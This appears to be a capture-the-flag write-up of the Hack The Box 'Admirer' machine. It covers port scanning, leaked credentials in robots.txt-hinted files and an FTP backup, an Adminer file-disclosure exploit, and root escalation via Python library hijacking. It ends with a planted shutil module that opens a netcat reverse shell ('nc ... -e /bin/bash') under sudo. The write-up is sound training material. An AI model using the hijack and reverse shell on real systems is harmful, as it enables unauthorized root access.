Hackthebox: Admirer Writeup

Hackthebox: Admirer Writeup

Here’s my writeup for the Admirer Hackthebox Linux machine – It’s an interesting challenge and learnt a couple of new things along the way. Password is the root hash in /etc/shadow and in the following format: M5g******************************f10

[passster password=”M5g.E5/j$AO7lZNZXLFABZld5uGh/YB3J1Va4AG9Tmw1icvm2MsDOj6B1RFloUmnA9jcj4DIsILOedBvVQg66CVjGrd.fl0″]

I start off by doing the basic port and service enumeration.

$ nmap -sC -sV -v -p- --min-rate=10000
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

So the server runs ftp, ssh, and a http server. For the http server, nmap results point me to the robots.txt and an admin-dir folder so let’s check it out. The default index.php seems fine and doesn’t seem to have anything exploitable. Move on to the next two items.

$ curl
User-agent: *
This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

I then tried accessing the admin-dir folder but I get a 403 – Access Forbidden. But the hint indicates contacts and creds, so let’s try that out. Turns out the filenames are contacts.txt and credentials.txt and we are able to get some service credentials (FTP, WordPress, internal mail). Since the FTP service is accessible, let’s try that.

ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 21:24 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 21:20 html.tar.gz

Inside the gzip tar file seems to be a backup of the web contents. I found a set of mysql connection creds in index.php.

$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$dbname = "admirerdb";

There’s also a utility-script folder, with some interesting files. There’s another set of creds in db_admin.php. Tried both on SSH login, not successful. Of the 4 files, only 3 remains on the web server. Maybe there’s new content. Checking back the file that was missing indicates a TODO that it might be replaced by an open source database management – which on Google returns Adminer. Mental note to check further. Now we know that the server has some admin tasks that can be ran, but checking it, seems like we can’t exploit it for a web shell.

Ok, so attempted to access adminer.php and got access to the page. Googling it for vulnerabilities and exploits indicates that the particular version is vulnerable to local file disclosure.

Since we had two sets of SQL creds earlier, I tried that for good measure. But failed to login.

Proceeded to set up my own SQL server to attempt to read files as per https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool but was unsuccessful in getting access to /etc/passwd. Tested for files in the webserver directory and was able to read index.php. There’s a new SQL password for waldo.

Tested the creds and it worked on adminer.php, but there’s not much we can do here. Tried ssh and now we can get the user flag.

Root Flag

Now let’s do some basic exploration and attempt at enumerating the box with linenum.sh.

Waldo has sudo access to run /opt/scripts/admin_tasks.sh, which are the admin_tasks found earlier. There are some new commands that previously couldn’t be ran from the webserver and these would be ran as root. Task 6 is particularly interesting as it calls another python script and it imports shutil. Looks like we could hijack it – so did some googling and came across this post which was rather useful. https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

However, another piece of the puzzle was missing. How do I set environment for sudo? Env variables are not passed to sudo, but turns out we can specify the variable directly in the sudo command. Now I can do a test. I create my own shutil, specify the new pythonpath and now I can call the script again.

import os
def make_archive(a,b,c):
os.system('nc 4444 -e /bin/bash')

sudo PYTHONPATH=/home/waldo/.nano/ /opt/scripts/admin_tasks.sh

With that, it will spawn a rc shell as root back to our machine.